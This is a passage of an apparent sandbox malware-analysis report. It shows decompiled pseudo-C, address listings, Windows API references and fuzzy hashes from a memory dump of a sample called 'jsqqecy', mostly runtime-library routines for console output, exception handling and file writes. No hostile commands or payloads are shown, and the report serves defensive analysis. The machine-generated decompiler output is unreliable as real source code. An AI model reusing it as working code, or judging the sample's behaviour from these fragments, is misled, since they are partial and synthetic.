									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00BCDDA0();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                          0x00bd790b
                          0x00bd790d
                          0x00bd7912
                          0x00bd7917
                          0x00bd7919
                          0x00bd791c
                          0x00bd7921
                          0x00bd7a31
                          0x00bd7a31
                          0x00bd7a31
                          0x00000000
                          0x00bd7930
                          0x00bd7930
                          0x00bd7935
                          0x00bd793f
                          0x00bd7941
                          0x00bd7946
                          0x00bd794b
                          0x00bd794b
                          0x00bd794d
                          0x00bd7950
                          0x00bd7955
                          0x00bd7977
                          0x00bd7977
                          0x00bd797a
                          0x00bd797d
                          0x00bd799b
                          0x00bd799e
                          0x00bd79dd
                          0x00bd79e0
                          0x00bd79e3
                          0x00bd7a08
                          0x00bd7a0a
                          0x00000000
                          0x00bd7a0c
                          0x00bd7a0c
                          0x00bd7a0e
                          0x00000000
                          0x00bd7a10
                          0x00bd7a10
                          0x00bd7a15
                          0x00bd7a19
                          0x00bd7a19
                          0x00bd7a1a
                          0x00000000
                          0x00bd7a1a
                          0x00bd7a0e
                          0x00bd79e5
                          0x00bd79e5
                          0x00bd79e7
                          0x00000000
                          0x00bd79e9
                          0x00bd79e9
                          0x00bd79eb
                          0x00000000
                          0x00bd79ed
                          0x00bd79fe
                          0x00000000
                          0x00bd7a03
                          0x00bd79eb
                          0x00bd79e7
                          0x00bd79a0
                          0x00bd79a0
                          0x00bd79a4
                          0x00000000
                          0x00bd79aa
                          0x00bd79aa
                          0x00bd79ac
                          0x00000000
                          0x00bd79b2
                          0x00bd79b9
                          0x00bd79c1
                          0x00bd79c5
                          0x00bd79c7
                          0x00bd79ca
                          0x00bd79cf
                          0x00bd79d0
                          0x00000000
                          0x00bd79d0
                          0x00bd79ca
                          0x00000000
                          0x00bd79c5
                          0x00bd79ac
                          0x00bd79a4
                          0x00bd797f
                          0x00bd797f
                          0x00000000
                          0x00bd797f
                          0x00bd795c
                          0x00bd795c
                          0x00bd7961
                          0x00bd7966
                          0x00000000
                          0x00bd7968
                          0x00bd796a
                          0x00bd7973
                          0x00bd7982
                          0x00bd7984
                          0x00bd7a43
                          0x00bd7a43
                          0x00bd7a48
                          0x00bd7a49
                          0x00bd7a4b
                          0x00bd7a50
                          0x00bd7a55
                          0x00bd7a58
                          0x00bd7a5b
                          0x00bd7a5e
                          0x00bd7a67
                          0x00bd7a67
                          0x00bd7a60
                          0x00bd7a60
                          0x00bd7a60
                          0x00bd7a6a
                          0x00bd7a6e
                          0x00bd7a71
                          0x00bd7a72
                          0x00bd7a73
                          0x00bd7a74
                          0x00bd7a77
                          0x00bd7a80
                          0x00bd7a80
                          0x00bd7a83
                          0x00bd7ab9
                          0x00bd7a85
                          0x00bd7a85
                          0x00bd7a85
                          0x00bd7a88
                          0x00bd7a9f
                          0x00bd7a9f
                          0x00bd7a88
                          0x00bd7abe
                          0x00bd7ac8
                          0x00bd7ad4
                          0x00bd7992
                          0x00bd7992
                          0x00bd7997
                          0x00bd7998
                          0x00bd79d2
                          0x00bd79d9
                          0x00bd7a1d
                          0x00bd7a1d
                          0x00bd7a24
                          0x00bd7a33
                          0x00bd7a36
                          0x00bd7a42
                          0x00bd7a42
                          0x00bd7984
                          0x00bd7966
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd7935

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 4a5e959ceaf9486d0ecd2f048a1b23155eeb0df3e5d15757389b7ce455b09beb
                          • Instruction ID: 5a23051735fc6edf080b28698ee5938045b62bac4020f5d60410845196230ab7
                          • Opcode Fuzzy Hash: 4a5e959ceaf9486d0ecd2f048a1b23155eeb0df3e5d15757389b7ce455b09beb
                          • Instruction Fuzzy Hash: 8351A172688606AFDB298F54D841BBDF7E5EF40710F2444AEE80557391FB319E40CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCB2E0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ColorObjectSelect$Text
                          • String ID:
                          • API String ID: 2688426544-0
                          • Opcode ID: 45d940713f19083c28a03e873563c2f653b868b69eb9baad749e5df3d67edec4
                          • Instruction ID: e772738e08ae80a275432a25905418feaeacdce6927fa2a20290baefd137826f
                          • Opcode Fuzzy Hash: 45d940713f19083c28a03e873563c2f653b868b69eb9baad749e5df3d67edec4
                          • Instruction Fuzzy Hash: 5D517F74A04208DFCB04EF68D599AACBBF1FB48314F1584ADE8899B351DB31E981DB45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC8DB0 Relevance: 6.1, APIs: 4, Instructions: 70windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Menu$CreateLongPopupSystemWindow
                          • String ID:
                          • API String ID: 3388415271-0
                          • Opcode ID: de003aa06a4f99fb76ccafd7e5c57f6197b372da64fe5b86bc7a6e83acd25062
                          • Instruction ID: 3285481601ee2f93b536fb8b054d6d936cf25c04262e3d1d651afebc832a9335
                          • Opcode Fuzzy Hash: de003aa06a4f99fb76ccafd7e5c57f6197b372da64fe5b86bc7a6e83acd25062
                          • Instruction Fuzzy Hash: 86318374A04208EFCB44EF68D188B9DBBF0FB48311F5184ADE8899B351DB749A84CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD8FCD Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00BD8FCD(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xbe48b0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00BD9041();
					E00BD9022();
					_t13 = WriteConsoleW( *0xbe48b0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                          0x00bd8fea
                          0x00bd8fee
                          0x00bd8ffb
                          0x00bd9000
                          0x00bd901b
                          0x00bd901b
                          0x00bd9021

                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00BD8B32,?,00000001,?,?,?,00BD6E1E,?,?,00000000), ref: 00BD8FE4
                          • GetLastError.KERNEL32(?,00BD8B32,?,00000001,?,?,?,00BD6E1E,?,?,00000000,?,?,?,00BD6769,?), ref: 00BD8FF0
                            • Part of subcall function 00BD9041: CloseHandle.KERNEL32(FFFFFFFE,00BD9000,?,00BD8B32,?,00000001,?,?,?,00BD6E1E,?,?,00000000,?,?), ref: 00BD9051
                          • ___initconout.LIBCMT ref: 00BD9000
                            • Part of subcall function 00BD9022: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00BD8FBE,00BD8B1F,?,?,00BD6E1E,?,?,00000000,?), ref: 00BD9035
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00BD8B32,?,00000001,?,?,?,00BD6E1E,?,?,00000000,?), ref: 00BD9015
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: 13a3c7a2b016f7d468742d5766015dfa8ce7c20b288094916cb6ac12e315aadf
                          • Instruction ID: 8bdd462381aeb6e8e74945180be79002705613dd8329799f4d3d2019a7b32069
                          • Opcode Fuzzy Hash: 13a3c7a2b016f7d468742d5766015dfa8ce7c20b288094916cb6ac12e315aadf
                          • Instruction Fuzzy Hash: 27F0C736500195BFCF222FD5EC459997FA5FB093A1F544551FD199B230DB7188209BD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC7990 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: (
                          • API String ID: 4218353326-3887548279
                          • Opcode ID: 16c88b7bd7cf7ee8278c332004bb7f646ccda41a30472927e537f375c094df9b
                          • Instruction ID: c435d2da6c6cd35435ecbbcadfdd01732c9dfd5e9b80d9082804595d16c6bc19
                          • Opcode Fuzzy Hash: 16c88b7bd7cf7ee8278c332004bb7f646ccda41a30472927e537f375c094df9b
                          • Instruction Fuzzy Hash: 6D51E471904209ABDB15DF58C496BADBBF0FB04314F04C8AEE869DB351DA34EA94CF45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD777B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 47%
                          			E00BD777B(void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed char _a32) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				signed int _t46;
				void* _t52;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr* _t63;

				E00BD2137(_a12);
				_pop(_t54);
				_t37 = E00BD1CCE(_t52, _t54, __edx, _t59, _t61);
				_t55 = _a20;
				_t58 = _a4;
				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
					if(( *(_t58 + 4) & 0x00000066) == 0) {
						if(_t55[3] != 0) {
							L14:
							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
								L19:
								E00BD7AE2(_t58, _t58, _a8, _a12, _a16, _t55, _a32, _a24, _a28);
								goto L20;
							} else {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
								if(_t63 == 0) {
									goto L19;
								}
								 *0xbe7000(_t58, _a8, _a12, _a16, _t55, _a24, _a28, _a32 & 0x000000ff);
								return  *_t63();
							}
						}
						_t46 =  *_t55 & 0x1fffffff;
						if(_t46 < 0x19930521 || _t55[7] == 0) {
							if(_t46 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
								goto L20;
							} else {
								goto L14;
							}
						} else {
							goto L14;
						}
					}
					if(_t55[1] != 0 && _a24 == 0) {
						L00BD737A(_a8, _a16, _t55);
					}
					goto L20;
				} else {
					L20:
					return 1;
				}
			}
















                          0x00bd7784
                          0x00bd7789
                          0x00bd778a
                          0x00bd778f
                          0x00bd7794
                          0x00bd77a4
                          0x00bd77cc
                          0x00bd77f7
                          0x00bd7817
                          0x00bd781d
                          0x00bd7859
                          0x00bd786d
                          0x00000000
                          0x00bd782a
                          0x00bd782d
                          0x00bd7832
                          0x00000000
                          0x00000000
                          0x00bd784c
                          0x00000000
                          0x00bd7854
                          0x00bd781d
                          0x00bd77fb
                          0x00bd7802
                          0x00bd780b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd7802
                          0x00bd77d1
                          0x00bd77e7
                          0x00bd77ec
                          0x00000000
                          0x00bd7875
                          0x00bd7875
                          0x00000000
                          0x00bd7877

                          APIs
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00BD7784
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ___except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3493665558-3733052814
                          • Opcode ID: d6d6c0c84a67f9f1996ee3ed615194ef4665ba9dd325f74a71c3e2602f87c034
                          • Instruction ID: 0a20c10aa675d8c473df93d017a5fa2a21197ba4ae57165ccb7376187057575c
                          • Opcode Fuzzy Hash: d6d6c0c84a67f9f1996ee3ed615194ef4665ba9dd325f74a71c3e2602f87c034
                          • Instruction Fuzzy Hash: A131A135584215EBCF264F51C8499EABBE6FB09315B184A9BF85449311FB33CC62EB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC49A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: EnumFamiliesFont
                          • String ID: 1$\
                          • API String ID: 2229041460-1239263948
                          • Opcode ID: 21f208f69169363252523435910f3441a73f4fbda56cafe6892c39276eefb9f9
                          • Instruction ID: d923082c30183e31aa93e87a6aeaea11c6e4619f775bc8e5e8a434afaa3030e0
                          • Opcode Fuzzy Hash: 21f208f69169363252523435910f3441a73f4fbda56cafe6892c39276eefb9f9
                          • Instruction Fuzzy Hash: 08418C74A04208DFDB04DF58C094BAABBF0FF48354F15C4AEE8898B362D775AA84CB41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC74E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: write failed: %lu
                          • API String ID: 442123175-171016427
                          • Opcode ID: 378bc5a7f72e70fd5328b4a7c9b028bb87e455e4c6470b13b6e4044c48abd40b
                          • Instruction ID: 67146eb22eb80ed52424c28265efec637d576151607cc6305f97882ede21ec30
                          • Opcode Fuzzy Hash: 378bc5a7f72e70fd5328b4a7c9b028bb87e455e4c6470b13b6e4044c48abd40b
                          • Instruction Fuzzy Hash: 7831C2B5508249DFCB00EF28C488BAA7BE5FF44344F0589A9F8898B351D774E994CF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC7610 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: write failed: %lu
                          • API String ID: 442123175-171016427
                          • Opcode ID: f158aa2edf339e964e3545ebfe5620a7781c5c4943ad3a279a14b1c11029733a
                          • Instruction ID: b91c246cbbd13845b10fdeeab626d8d37d019468f7ec298a4045c45df09480c2
                          • Opcode Fuzzy Hash: f158aa2edf339e964e3545ebfe5620a7781c5c4943ad3a279a14b1c11029733a
                          • Instruction Fuzzy Hash: 6F11F0B05082089FC700EF1CD488BAABBE5EF44354F5585BDE8898B361DB749988CBD2
                          Uniqueness

                          Uniqueness Score: -1.00%